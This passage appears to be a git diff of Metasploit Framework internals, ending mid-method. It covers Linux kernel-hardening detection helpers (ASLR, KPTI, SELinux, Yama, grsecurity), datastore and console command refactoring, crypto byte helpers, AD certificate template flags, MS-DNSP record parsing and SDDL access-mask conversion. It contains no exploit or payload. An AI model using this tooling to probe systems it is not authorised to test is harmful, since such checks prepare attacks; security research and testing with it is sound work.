-    aslr = read_file('/proc/sys/kernel/randomize_va_space').to_s.strip
-    (aslr.eql?('1') || aslr.eql?('2'))
-  rescue
-    raise 'Could not determine ASLR status'
-  end
+        #
+        # Returns true if Kernel Page-Table Isolation (KPTI) is enabled, false if not.
+        #
+        # @return [Boolean]
+        #
+        def kpti_enabled?
+          cpu_flags.include? 'pti'
+        rescue StandardError
+          raise 'Could not determine KPTI status'
+        end

-  #
-  # Returns true if Exec-Shield is enabled
-  #
-  # @return [Boolean]
-  #
-  def exec_shield_enabled?
-    exec_shield = read_file('/proc/sys/kernel/exec-shield').to_s.strip
-    (exec_shield.eql?('1') || exec_shield.eql?('2'))
-  rescue
-    raise 'Could not determine exec-shield status'
-  end
+        #
+        # Returns true if user namespaces are enabled, false if not.
+        #
+        # @return [Boolean]
+        #
+        def userns_enabled?
+          return false if read_file('/proc/sys/user/max_user_namespaces').to_s.strip.eql? '0'
+          return false if read_file('/proc/sys/kernel/unprivileged_userns_clone').to_s.strip.eql? '0'

-  #
-  # Returns true if unprivileged bpf is disabled
-  #
-  # @return [Boolean]
-  #
-  def unprivileged_bpf_disabled?
-    unprivileged_bpf_disabled = read_file('/proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip
-    return (unprivileged_bpf_disabled == '1' || unprivileged_bpf_disabled == '2')
-  rescue
-    raise 'Could not determine kernel.unprivileged_bpf_disabled status'
-  end
+          true
+        rescue StandardError
+          raise 'Could not determine userns status'
+        end

-  #
-  # Returns true if kernel pointer restriction is enabled
-  #
-  # @return [Boolean]
-  #
-  def kptr_restrict?
-    read_file('/proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1'
-  rescue
-    raise 'Could not determine kernel.kptr_restrict status'
-  end
+        #
+        # Returns true if Address Space Layout Randomization (ASLR) is enabled
+        #
+        # @return [Boolean]
+        #
+        def aslr_enabled?
+          aslr = read_file('/proc/sys/kernel/randomize_va_space').to_s.strip
+          aslr.eql?('1') || aslr.eql?('2')
+        rescue StandardError
+          raise 'Could not determine ASLR status'
+        end

-  #
-  # Returns true if dmesg restriction is enabled
-  #
-  # @return [Boolean]
-  #
-  def dmesg_restrict?
-    read_file('/proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1'
-  rescue
-    raise 'Could not determine kernel.dmesg_restrict status'
-  end
+        #
+        # Returns true if Exec-Shield is enabled
+        #
+        # @return [Boolean]
+        #
+        def exec_shield_enabled?
+          exec_shield = read_file('/proc/sys/kernel/exec-shield').to_s.strip
+          exec_shield.eql?('1') || exec_shield.eql?('2')
+        rescue StandardError
+          raise 'Could not determine exec-shield status'
+        end

-  #
-  # Returns mmap minimum address
-  #
-  # @return [Integer]
-  #
-  def mmap_min_addr
-    mmap_min_addr = read_file('/proc/sys/vm/mmap_min_addr').to_s.strip
-    return 0 unless mmap_min_addr =~ /\A\d+\z/
-    mmap_min_addr
-  rescue
-    raise 'Could not determine system mmap_min_addr'
-  end
+        #
+        # Returns true if unprivileged bpf is disabled
+        #
+        # @return [Boolean]
+        #
+        def unprivileged_bpf_disabled?
+          unprivileged_bpf_disabled = read_file('/proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip
+          return unprivileged_bpf_disabled == '1' || unprivileged_bpf_disabled == '2'
+        rescue StandardError
+          raise 'Could not determine kernel.unprivileged_bpf_disabled status'
+        end

-  #
-  # Returns true if Linux Kernel Runtime Guard (LKRG) kernel module is installed
-  #
-  def lkrg_installed?
-    directory?('/proc/sys/lkrg')
-  rescue
-    raise 'Could not determine LKRG status'
-  end
+        #
+        # Returns true if kernel pointer restriction is enabled
+        #
+        # @return [Boolean]
+        #
+        def kptr_restrict?
+          read_file('/proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1'
+        rescue StandardError
+          raise 'Could not determine kernel.kptr_restrict status'
+        end

-  #
-  # Returns true if grsecurity is installed
-  #
-  def grsec_installed?
-    File.exists?('/dev/grsec') && File.chardev?('/dev/grsec')
-  rescue
-    raise 'Could not determine grsecurity status'
-  end
+        #
+        # Returns true if dmesg restriction is enabled
+        #
+        # @return [Boolean]
+        #
+        def dmesg_restrict?
+          read_file('/proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1'
+        rescue StandardError
+          raise 'Could not determine kernel.dmesg_restrict status'
+        end

-  #
-  # Returns true if PaX is installed
-  #
-  def pax_installed?
-    read_file('/proc/self/status').to_s.include? 'PaX:'
-  rescue
-    raise 'Could not determine PaX status'
-  end
+        #
+        # Returns mmap minimum address
+        #
+        # @return [Integer]
+        #
+        def mmap_min_addr
+          mmap_min_addr = read_file('/proc/sys/vm/mmap_min_addr').to_s.strip
+          return 0 unless mmap_min_addr =~ /\A\d+\z/

-  #
-  # Returns true if SELinux is installed
-  #
-  # @return [Boolean]
-  #
-  def selinux_installed?
-    cmd_exec('id').to_s.include? 'context='
-  rescue
-    raise 'Could not determine SELinux status'
-  end
+          mmap_min_addr
+        rescue StandardError
+          raise 'Could not determine system mmap_min_addr'
+        end

-  #
-  # Returns true if SELinux is in enforcing mode
-  #
-  # @return [Boolean]
-  #
-  def selinux_enforcing?
-    return false unless selinux_installed?
+        #
+        # Returns true if Linux Kernel Runtime Guard (LKRG) kernel module is installed
+        #
+        def lkrg_installed?
+          directory?('/proc/sys/lkrg')
+        rescue StandardError
+          raise 'Could not determine LKRG status'
+        end

-    sestatus = cmd_exec('/usr/sbin/sestatus').to_s.strip
-    raise unless sestatus.include?('SELinux')
+        #
+        # Returns true if grsecurity is installed
+        #
+        def grsec_installed?
+          cmd_exec('test -c /dev/grsec && echo true').to_s.strip.include? 'true'
+        rescue StandardError
+          raise 'Could not determine grsecurity status'
+        end

-    return true if sestatus =~ /Current mode:\s*enforcing/
-    false
-  rescue
-    raise 'Could not determine SELinux status'
-  end
+        #
+        # Returns true if PaX is installed
+        #
+        def pax_installed?
+          read_file('/proc/self/status').to_s.include? 'PaX:'
+        rescue StandardError
+          raise 'Could not determine PaX status'
+        end

-  #
-  # Returns true if Yama is installed
-  #
-  # @return [Boolean]
-  #
-  def yama_installed?
-    ptrace_scope = read_file('/proc/sys/kernel/yama/ptrace_scope').to_s.strip
-    return true if ptrace_scope =~ /\A\d\z/
-    false
-  rescue
-    raise 'Could not determine Yama status'
-  end
+        #
+        # Returns true if SELinux is installed
+        #
+        # @return [Boolean]
+        #
+        def selinux_installed?
+          cmd_exec('id').to_s.include? 'context='
+        rescue StandardError
+          raise 'Could not determine SELinux status'
+        end

-  #
-  # Returns true if Yama is enabled
-  #
-  # @return [Boolean]
-  #
-  def yama_enabled?
-    return false unless yama_installed?
-    !read_file('/proc/sys/kernel/yama/ptrace_scope').to_s.strip.eql? '0'
-  rescue
-    raise 'Could not determine Yama status'
-  end
-end # Kernel
-end # Linux
-end # Post
+        #
+        # Returns true if SELinux is in enforcing mode
+        #
+        # @return [Boolean]
+        #
+        def selinux_enforcing?
+          return false unless selinux_installed?
+
+          sestatus = cmd_exec('/usr/sbin/sestatus').to_s.strip
+          raise unless sestatus.include?('SELinux')
+
+          return true if sestatus =~ /Current mode:\s*enforcing/
+
+          false
+        rescue StandardError
+          raise 'Could not determine SELinux status'
+        end
+
+        #
+        # Returns true if Yama is installed
+        #
+        # @return [Boolean]
+        #
+        def yama_installed?
+          ptrace_scope = read_file('/proc/sys/kernel/yama/ptrace_scope').to_s.strip
+          return true if ptrace_scope =~ /\A\d\z/
+
+          false
+        rescue StandardError
+          raise 'Could not determine Yama status'
+        end
+
+        #
+        # Returns true if Yama is enabled
+        #
+        # @return [Boolean]
+        #
+        def yama_enabled?
+          return false unless yama_installed?
+
+          !read_file('/proc/sys/kernel/yama/ptrace_scope').to_s.strip.eql? '0'
+        rescue StandardError
+          raise 'Could not determine Yama status'
+        end
+      end # Kernel
+    end # Linux
+  end # Post
 end # Msf
@@ -65,7 +65,7 @@ module Msf
      return unless block_given?

      parse(@value, @datastore).each do |result|
-        block.call(result) if result.is_a?(Msf::DataStore) || result.is_a?(Msf::DataStoreWithFallbacks)
+        block.call(result) if result.is_a?(Msf::DataStore)
      end

      nil
@@ -99,7 +99,7 @@ module Msf
    # @return [Boolean] True if all items are valid, and there are at least some items present to iterate over. False otherwise.
    def valid?
      parsed_values = parse(@value, @datastore)
-      parsed_values.all? { |result| result.is_a?(Msf::DataStore) || result.is_a?(Msf::DataStoreWithFallbacks) } && parsed_values.count > 0
+      parsed_values.all? { |result| result.is_a?(Msf::DataStore) } && parsed_values.count > 0
    rescue StandardError => e
      elog('rhosts walker invalid', error: e)
      false
@@ -64,7 +64,7 @@ class RPC_Core < RPC_Base
  # @example Here's how you would use this from the client:
  #  rpc.call('core.unsetg', 'MyGlobal')
  def rpc_unsetg(var)
-    if framework.datastore.is_a?(Msf::DataStoreWithFallbacks)
+    if framework.datastore.is_a?(Msf::DataStore)
      framework.datastore.unset(var)
    else
      framework.datastore.delete(var)
@@ -2081,7 +2081,7 @@ class Core
    print_line "datastore.  Use -g to operate on the global datastore."
    print_line
    print_line "If setting a PAYLOAD, this command can take an index from `show payloads'."
-    print @@set_opts.usage if framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
+    print @@set_opts.usage
    print_line
  end

@@ -2103,7 +2103,7 @@ class Core
      elsif args[0] == '-a'
        args.shift
        append = true
-      elsif (args[0] == '-c' || args[0] == '--clear') && framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
+      elsif (args[0] == '-c' || args[0] == '--clear')
        args.shift
        clear = true
      else
@@ -2271,7 +2271,7 @@ class Core
    print_line "Usage: setg [option] [value]"
    print_line
    print_line "Exactly like set -g, set a value in the global datastore."
-    print @@setg_opts.usage if framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
+    print @@setg_opts.usage
    print_line
  end

@@ -2433,83 +2433,18 @@ class Core
  end

  def cmd_unset_help
-    if framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
-      print_line "Usage: unset [-g] var1 var2 var3 ..."
-      print_line
-      print_line "The unset command is used to unset one or more variables."
-      print_line "To flush all entries, specify 'all' as the variable name."
-      print_line "With -g, operates on global datastore variables."
-      print_line
-    else
-      print_line "Usage: unset [options] var1 var2 var3 ..."
-      print_line
-      print_line "The unset command is used to unset one or more variables which have been set by the user."
-      print_line "To update all entries, specify 'all' as the variable name."
-      print @@unset_opts.usage
-      print_line
-    end
+    print_line "Usage: unset [-g] var1 var2 var3 ..."
+    print_line
+    print_line "The unset command is used to unset one or more variables."
+    print_line "To flush all entries, specify 'all' as the variable name."
+    print_line "With -g, operates on global datastore variables."
+    print_line
  end

  #
  # Unsets a value if it's been set.
  #
  def cmd_unset(*args)
-    if framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
-      return cmd_unset_with_fallbacks(*args)
-    end
-
-    # Figure out if these are global variables
-    global = false
-
-    if (args[0] == '-g')
-      args.shift
-      global = true
-    end
-
-    # Determine which data store we're operating on
-    if (active_module and global == false)
-      datastore = active_module.datastore
-    else
-      datastore = framework.datastore
-    end
-
-    # No arguments?  No cookie.
-    if (args.length == 0)
-      cmd_unset_help
-      return false
-    end
-
-    # If all was specified, then flush all of the entries
-    if args[0] == 'all'
-      print_line("Flushing datastore...")
-
-      # Re-import default options into the module's datastore
-      if (active_module and global == false)
-        active_module.import_defaults
-      # Or simply clear the global datastore
-      else
-        datastore.clear
-      end
-
-      return true
-    end
-
-    while ((val = args.shift))
-      if (driver.on_variable_unset(global, val) == false)
-        print_error("The variable #{val} cannot be unset at this time.")
-        next
-      end
-
-      print_line("Unsetting #{val}...")
-
-      datastore.delete(val)
-    end
-  end
-
-  #
-  # Unsets a value if it's been set, resetting the value back to a default value
-  #
-  def cmd_unset_with_fallbacks(*args)
    if args.include?('-h') || args.include?('--help')
      cmd_unset_help
      return
@@ -2591,7 +2526,7 @@ class Core
    print_line "Usage: unsetg [options] var1 var2 var3 ..."
    print_line
    print_line "Exactly like unset -g, unset global variables, or all"
-    print @@unsetg_opts.usage if framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
+    print @@unsetg_opts.usage
    print_line
  end

@@ -67,9 +67,7 @@ class Msf::Ui::Console::CommandDispatcher::Developer
  end

  # XXX: This will try to reload *any* .rb and break on modules
-  def reload_file(path, print_errors: true)
-    full_path = File.expand_path(path)
-
+  def reload_file(full_path, print_errors: true)
    unless File.exist?(full_path) && full_path.end_with?('.rb')
      print_error("#{full_path} must exist and be a .rb file") if print_errors
      return
@@ -94,11 +92,16 @@ class Msf::Ui::Console::CommandDispatcher::Developer
      files = []
    end

+    ignored_patterns = %w[
+      **/Gemfile
+      **/Gemfile.lock
+      **/*_spec.rb
+      **/spec_helper.rb
+    ]
    @modified_files ||= []
-    @modified_files |= files.map do |file|
-      next if file.end_with?('_spec.rb') || file.end_with?("spec_helper.rb")
-      File.join(Msf::Config.install_root, file)
-    end.compact
+    @modified_files |= files.reject do |file|
+      ignored_patterns.any? { |pattern| File.fnmatch(pattern, file) }
+    end
    @modified_files
  end

@@ -512,20 +515,35 @@ class Msf::Ui::Console::CommandDispatcher::Developer
    print_line
  end

-  private
+  protected
+
+  def source_directories
+    [Msf::Config.install_root]
+  end

  def modified_files
    # Using an array avoids shelling out, so we avoid escaping/quoting
    changed_files = %w[git diff --name-only]
-    begin
-      output, status = Open3.capture2e(*changed_files, chdir: Msf::Config.install_root)
-      is_success = status.success?
-      output = output.split("\n")
-    rescue => e
-      elog(e)
-      output = []
-      is_success = false
+
+    is_success = true
+    files = []
+    source_directories.each do |directory|
+      begin
+        output, status = Open3.capture2e(*changed_files, chdir: directory)
+        is_success = status.success?
+        break unless is_success
+
+        files += output.split("\n").map do |path|
+          realpath = Pathname.new(directory).join(path).realpath
+          raise "invalid path" unless realpath.to_s.start_with?(directory)
+          realpath.to_s
+        end
+      rescue => e
+        elog(e)
+        is_success = false
+        break
+      end
    end
-    return output, is_success
+    [files, is_success]
  end
 end
@@ -385,6 +385,7 @@ module Msf
              'author'      => 'Modules written by this author',
              'arch'        => 'Modules affecting this architecture',
              'bid'         => 'Modules with a matching Bugtraq ID',
+              'osvdb'       => 'Modules with a matching OSVDB ID',
              'cve'         => 'Modules with a matching CVE ID',
              'edb'         => 'Modules with a matching Exploit-DB ID',
              'check'       => 'Modules that support the \'check\' method',
@@ -611,10 +611,6 @@ protected
      return false
    elsif active_module && (active_module.exploit? || active_module.evasion?)
      return false unless active_module.is_payload_compatible?(val)
-    elsif active_module && !framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
-      active_module.datastore.clear_non_user_defined
-    elsif framework && !framework.features.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
-      framework.datastore.clear_non_user_defined
    end
  end

@@ -17,10 +17,10 @@ module Msf
        #   stage since the command itself has been completed.
        def tab_complete_datastore_names(datastore, _str, _words)
          keys = (
-            Msf::DataStoreWithFallbacks::GLOBAL_KEYS +
+            Msf::DataStore::GLOBAL_KEYS +
              datastore.keys
          )
-          keys.concat(datastore.options.values.flat_map(&:fallbacks)) if datastore.is_a?(Msf::DataStoreWithFallbacks)
+          keys.concat(datastore.options.values.flat_map(&:fallbacks)) if datastore.is_a?(Msf::DataStore)
          keys.uniq! { |key| key.downcase }
          keys
        end
@@ -75,7 +75,7 @@ class MsfAutoload
      "#{__dir__}/msf/core/rpc/v10",
      "#{__dir__}/msf/core/payload/osx/x64",
      "#{__dir__}/msf/core/payload/windows/x64",
-      "#{__dir__}/msf/core/payload/linux/x64",
+      # "#{__dir__}/msf/core/payload/linux/x64",
      "#{__dir__}/msf/core/web_services/servlet",
      "#{__dir__}/msf/base",
      "#{__dir__}/rex/parser/fs"
@@ -27,4 +27,27 @@ module Rex::Crypto
  def self.rc4(key, value)
    Rc4.rc4(key, value)
  end
+
+  # Returns an integer represented as a byte array. Useful for certain key-related operations.
+  #
+  # @param bytes [String] The bytes to convert
+  # @return [Integer] The converted value.
+  def self.bytes_to_int(bytes)
+    bytes.each_byte.reduce(0) { |acc, byte| (acc << 8) | byte }
+  end
+
+  # Returns a byte array represented as a big-endian integer. Useful for certain key-related operations.
+  #
+  # @param bytes [String] The bytes to convert
+  # @return [Integer] The converted value.
+  def self.int_to_bytes(num)
+    bytes = []
+
+    while num > 0
+      bytes.unshift(num & 0xff)
+      num >>= 8
+    end
+
+    bytes.pack("C*")
+  end
 end
@@ -189,7 +189,7 @@ class Console::CommandDispatcher::Lanattacks::Dhcp

    datastore = args.shift

-    unless datastore.is_a?(Hash) || datastore.is_a?(Msf::DataStoreWithFallbacks)
+    unless datastore.is_a?(Hash) || datastore.is_a?(Msf::DataStore)
      print_dhcp_load_options_usage
      return true
    end
@@ -45,15 +45,22 @@ module DNS
    # Add record to cache, only when "running"
    #
    # @param record [Dnsruby::RR] Record to cache
-    def cache_record(record)
+    def cache_record(record, expire: true)
      return unless @monitor_thread
-      if record.is_a?(Dnsruby::RR) and
-      (!record.respond_to?(:address) or Rex::Socket.is_ip_addr?(record.address.to_s)) and
-      record.name.to_s.match(MATCH_HOSTNAME)
-        add(record, ::Time.now.to_i + record.ttl)
-      else
-        raise "Invalid record for cache entry - #{record.inspect}"
+
+      unless record.is_a?(Dnsruby::RR)
+        raise "Invalid record for cache entry (not an RR) - #{record.inspect}"
      end
+
+      unless (!record.respond_to?(:address) || Rex::Socket.is_ip_addr?(record.address.to_s))
+        raise "Invalid record for cache entry (no IP address) - #{record.inspect}"
+      end
+
+      unless record.name.to_s.match(MATCH_HOSTNAME)
+        raise "Invalid record for cache entry (invalid hostname) - #{record.inspect}"
+      end
+
+      add(record, expire ? (::Time.now.to_i + record.ttl) : 0)
    end

    #
@@ -25,8 +25,8 @@ module Rex::Proto::MsAdts
      when KEY_USAGE_NGC
        result = Rex::Proto::BcryptPublicKey.new
        result.key_length = public_key.n.num_bits
-        n = self.class.int_to_bytes(public_key.n)
-        e = self.class.int_to_bytes(public_key.e)
+        n = Rex::Crypto.int_to_bytes(public_key.n.to_i)
+        e = Rex::Crypto.int_to_bytes(public_key.e.to_i)
        result.exponent = e
        result.modulus = n
        result.prime1 = ''
@@ -136,8 +136,8 @@ module Rex::Proto::MsAdts
      when KEY_USAGE_NGC
        if raw_key_material.start_with?([Rex::Proto::BcryptPublicKey::MAGIC].pack('I'))
          result = Rex::Proto::BcryptPublicKey.read(raw_key_material)
-          exponent = OpenSSL::ASN1::Integer.new(bytes_to_int(result.exponent))
-          modulus = OpenSSL::ASN1::Integer.new(bytes_to_int(result.modulus))
+          exponent = OpenSSL::ASN1::Integer.new(Rex::Crypto.bytes_to_int(result.exponent))
+          modulus = OpenSSL::ASN1::Integer.new(Rex::Crypto.bytes_to_int(result.modulus))
          # OpenSSL's API has changed over time - constructing from DER has been consistent
          data_sequence = OpenSSL::ASN1::Sequence([modulus, exponent])

@@ -165,16 +165,6 @@ module Rex::Proto::MsAdts
      end
    end

-    def self.int_to_bytes(num)
-      str = num.to_s(16).rjust(2, '0')
-
-      [str].pack('H*')
-    end
-
-    def bytes_to_int(num)
-      num.unpack('H*')[0].to_i(16)
-    end
-
    # Sets self.key_hash based on the credential_entries value in the provided parameter
    # @param struct [MsAdtsKeyCredentialStruct] Its credential_entries value should have only those required to calculate the key_hash value (no key_id or key_hash)
    def calculate_key_hash(struct)
@@ -182,4 +172,4 @@ module Rex::Proto::MsAdts
      self.key_hash = sha256.digest(struct.credential_entries.to_binary_s)
    end
  end
-end
+end
@@ -5,13 +5,26 @@ module Rex::Proto
  module MsCrtd
    # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/4c6950e4-1dc2-4ae3-98c3-b8919bb73822

+    # [2.4 flags Attribute](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/6cc7eb79-3e84-477a-b398-b0ff2b68a6c0)
+    CT_FLAG_AUTO_ENROLLMENT = 0x00000020
+    CT_FLAG_MACHINE_TYPE = 0x00000040
+    CT_FLAG_IS_CA = 0x00000080
+    CT_FLAG_ADD_TEMPLATE_NAME = 0x00000200
+    CT_FLAG_IS_CROSS_CA = 0x00000800
+    CT_FLAG_IS_DEFAULT = 0x00010000
+    CT_FLAG_IS_MODIFIED = 0x00020000
+    CT_FLAG_DONOTPERSISTINDB = 0x00001000
+    CT_FLAG_ADD_EMAIL = 0x00000002
+    CT_FLAG_PUBLISH_TO_DS = 0x00000008
+    CT_FLAG_EXPORTABLE_KEY = 0x00000010
+
    # [2.26 msPKI-Enrollment-Flag Attribute](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/ec71fd43-61c2-407b-83c9-b52272dec8a1)
    CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
    CT_FLAG_PEND_ALL_REQUESTS = 0x00000002
    CT_FLAG_PUBLISH_TO_KRA_CONTAINER = 0x00000004
-    CT_FLAG_PUBLISH_TO_DS = 0x00000008
+    #CT_FLAG_PUBLISH_TO_DS = 0x00000008
    CT_FLAG_AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE = 0x00000010
-    CT_FLAG_AUTO_ENROLLMENT = 0x00000020
+    #CT_FLAG_AUTO_ENROLLMENT = 0x00000020
    CT_FLAG_PREVIOUS_APPROVAL_VALIDATE_REENROLLMENT = 0x00000040
    CT_FLAG_USER_INTERACTION_REQUIRED = 0x00000100
    CT_FLAG_REMOVE_INVALID_CERTIFICATE_FROM_PERSONAL_STORE = 0x00000400
@@ -26,7 +39,7 @@ module Rex::Proto

    # [2.27 msPKI-Private-Key-Flag Attribute](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/f6122d87-b999-4b92-bff8-f465e8949667)
    CT_FLAG_REQUIRE_PRIVATE_KEY_ARCHIVAL = 0x00000001
-    CT_FLAG_EXPORTABLE_KEY = 0x00000010
+    #CT_FLAG_EXPORTABLE_KEY = 0x00000010
    CT_FLAG_STRONG_KEY_PROTECTION_REQUIRED = 0x00000020
    CT_FLAG_REQUIRE_ALTERNATE_SIGNATURE_ALGORITHM = 0x00000040
    CT_FLAG_REQUIRE_SAME_KEY_RENEWAL = 0x00000080
@@ -0,0 +1,102 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+require 'bindata'
+
+module Rex::Proto
+  module MsDnsp
+    # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/39b03b89-2264-4063-8198-d62f62a6441a
+    class DnsRecordType
+      DNS_TYPE_ZERO = 0x0000
+      DNS_TYPE_A = 0x0001
+      DNS_TYPE_NS = 0x0002
+      DNS_TYPE_MD = 0x0003
+      DNS_TYPE_MF = 0x0004
+      DNS_TYPE_CNAME = 0x0005
+      DNS_TYPE_SOA = 0x0006
+      DNS_TYPE_MB = 0x0007
+      DNS_TYPE_MG = 0x0008
+      DNS_TYPE_MR = 0x0009
+      DNS_TYPE_NULL = 0x000A
+      DNS_TYPE_WKS = 0x000B
+      DNS_TYPE_PTR = 0x000C
+      DNS_TYPE_HINFO = 0x000D
+      DNS_TYPE_MINFO = 0x000E
+      DNS_TYPE_MX = 0x000F
+      DNS_TYPE_TXT = 0x0010
+      DNS_TYPE_RP = 0x0011
+      DNS_TYPE_AFSDB = 0x0012
+      DNS_TYPE_X25 = 0x0013
+      DNS_TYPE_ISDN = 0x0014
+      DNS_TYPE_RT = 0x0015
+      DNS_TYPE_SIG = 0x0018
+      DNS_TYPE_KEY = 0x0019
+      DNS_TYPE_AAAA = 0x001C
+      DNS_TYPE_LOC = 0x001D
+      DNS_TYPE_NXT = 0x001E
+      DNS_TYPE_SRV = 0x0021
+      DNS_TYPE_ATMA = 0x0022
+      DNS_TYPE_NAPTR = 0x0023
+      DNS_TYPE_DNAME = 0x0027
+      DNS_TYPE_DS = 0x002B
+      DNS_TYPE_RRSIG = 0x002E
+      DNS_TYPE_NSEC = 0x002F
+      DNS_TYPE_DNSKEY = 0x0030
+      DNS_TYPE_DHCID = 0x0031
+      DNS_TYPE_NSEC3 = 0x0032
+      DNS_TYPE_NSEC3PARAM = 0x0033
+      DNS_TYPE_TLSA = 0x0034
+      DNS_TYPE_ALL = 0x00FF
+      DNS_TYPE_WINS = 0xFF01
+      DNS_TYPE_WINSR = 0xFF02
+    end
+
+    class MsDnspAddr4 < BinData::Primitive
+      string :data, length: 4
+
+      def get
+        Rex::Socket.addr_ntoa(self.data)
+      end
+
+      def set(v)
+        raise TypeError, 'must be an IPv4 address' unless Rex::Socket.is_ipv4?(v)
+
+        self.data = Rex::Socket.addr_aton(v)
+      end
+    end
+
+    class MsDnspAddr6 < BinData::Primitive
+      string :data, length: 16
+
+      def get
+        Rex::Socket.addr_ntoa(self.data)
+      end
+
+      def set(v)
+        raise TypeError, 'must be an IPv6 address' unless Rex::Socket.is_ipv6?(v)
+
+        self.data = Rex::Socket.addr_aton(v)
+      end
+    end
+
+    # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dnsp/6912b338-5472-4f59-b912-0edb536b6ed8
+    class MsDnspDnsRecord < BinData::Record
+      endian :little
+
+      uint16   :data_length, initial_value: -> { data.length }
+      uint16   :record_type
+      uint8    :version
+      uint8    :rank
+      uint16   :flags
+      uint32   :serial
+      uint32be :ttl_seconds
+      uint32   :reserved
+      uint32   :timestamp
+      choice   :data, selection: :record_type do
+        ms_dnsp_addr4 DnsRecordType::DNS_TYPE_A
+        ms_dnsp_addr6 DnsRecordType::DNS_TYPE_AAAA
+        string :default, read_length: :data_length
+      end
+    end
+  end
+end
@@ -5,6 +5,9 @@ require 'ruby_smb'
 require 'rex/proto/secauthz/well_known_sids'

 module Rex::Proto::MsDtyp
+  class SDDLParseError < Rex::RuntimeError
+  end
+
  # [2.4.3 ACCESS_MASK](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/7a53f60e-e730-4dfe-bbe9-b21b62eb790b)
  class MsDtypAccessMask < BinData::Record
    endian :little
@@ -45,6 +48,120 @@ module Rex::Proto::MsDtyp

    ALL  = MsDtypAccessMask.new({ gr: 1, gw: 1, gx: 1, ga: 1, ma: 1, as: 1, sy: 1, wo: 1, wd: 1, rc: 1, de: 1, protocol: 0xffff })
    NONE = MsDtypAccessMask.new({ gr: 0, gw: 0, gx: 0, ga: 0, ma: 0, as: 0, sy: 0, wo: 0, wd: 0, rc: 0, de: 0, protocol: 0 })
+
+    def to_sddl_text
+      sddl_text_tokens = []
+
+      if (protocol & 0b1111111000000000) != 0 || ma == 1 || as == 1
+        # if one of these conditions are true, we can't reduce this to a set of flags so dump it as hex
+        return "0x#{to_binary_s.unpack1('L<').to_s(16).rjust(8, '0')}"
+      end
+
+      sddl_text_tokens << 'GA' if ga == 1
+      sddl_text_tokens << 'GR' if gr == 1
+      sddl_text_tokens << 'GW' if gw == 1
+      sddl_text_tokens << 'GX' if gx == 1
+
+      file_access_mask = protocol & 0b000111111111
+      sddl_text_tokens << 'FA' if file_access_mask == 0b000111111111 && de == 1 && rc == 1 && wd == 1 && wo == 1 && sy == 1
+      sddl_text_tokens << 'FR' if file_access_mask == 0b000010001001
+      sddl_text_tokens << 'FW' if file_access_mask == 0b000100010110
+      sddl_text_tokens << 'FX' if file_access_mask == 0b000010100000
+
+      # windows does not reduce registry access flags (i.e. KA, KR, KW) so ignore them here to match it
+
+      sddl_text_tokens << 'CC' if (protocol & 0b000000000001) != 0 && !sddl_text_tokens.include?('FA') && !sddl_text_tokens.include?('FR')
+      sddl_text_tokens << 'DC' if (protocol & 0b000000000010) != 0 && !sddl_text_tokens.include?('FA') && !sddl_text_tokens.include?('FW')
+      sddl_text_tokens << 'LC' if (protocol & 0b000000000100) != 0 && !sddl_text_tokens.include?('FA') && !sddl_text_tokens.include?('FW')
+      sddl_text_tokens << 'SW' if (protocol & 0b000000001000) != 0 && !sddl_text_tokens.include?('FA') && !sddl_text_tokens.include?('FR')
+      sddl_text_tokens << 'RP' if (protocol & 0b000000010000) != 0 && !sddl_text_tokens.include?('FA') && !sddl_text_tokens.include?('FW')
+      sddl_text_tokens << 'WP' if (protocol & 0b000000100000) != 0 && !sddl_text_tokens.include?('FA') && !sddl_text_tokens.include?('FX')
+      sddl_text_tokens << 'DT' if (protocol & 0b000001000000) != 0 && !sddl_text_tokens.include?('FA')
+      sddl_text_tokens << 'LO' if (protocol & 0b000010000000) != 0 && !sddl_text_tokens.include?('FA')
+      sddl_text_tokens << 'CR' if (protocol & 0b000100000000) != 0 && !sddl_text_tokens.include?('FA')
+
+      sddl_text_tokens << 'SD' if de == 1 && !sddl_text_tokens.include?('FA')
+      sddl_text_tokens << 'RC' if rc == 1 && !sddl_text_tokens.include?('FA')
+      sddl_text_tokens << 'WD' if wd == 1 && !sddl_text_tokens.include?('FA')
+      sddl_text_tokens << 'WO' if wo == 1 && !sddl_text_tokens.include?('FA')
+
+      sddl_text_tokens.join('')
+    end
+
+    def self.from_sddl_text(sddl_text)
+      if sddl_text =~ /\A0x[0-9a-fA-F]{1,8}\Z/
+        return self.read([sddl_text.delete_prefix('0x').to_i(16)].pack('L<'))
+      end
+
+      access_mask = self.new
+      sddl_text.split(/(G[ARWX]|RC|SD|WD|WO|RP|WP|CC|DC|LC|SW|LO|DT|CR|F[ARWX]|K[ARWX]|N[RWX])/).each do |right|
+        case right
+        # generic access rights
+        when 'GA', 'GR', 'GW', 'GX'
+          access_mask.send("#{right.downcase}=", true)
+        # standard access rights
+        when 'RC'
+          access_mask.rc = true
+        when 'SD'
+          access_mask.de = true
+        when 'WD', 'WO'
+          access_mask.send("#{right.downcase}=", true)
+        # directory service object access rights
+        when 'RP'
+          access_mask.protocol |= 16
+        when 'WP'
+          access_mask.protocol |= 32
+        when 'CC'
+          access_mask.protocol |= 1
+        when 'DC'
+          access_mask.protocol |= 2
+        when 'LC'
+          access_mask.protocol |= 4
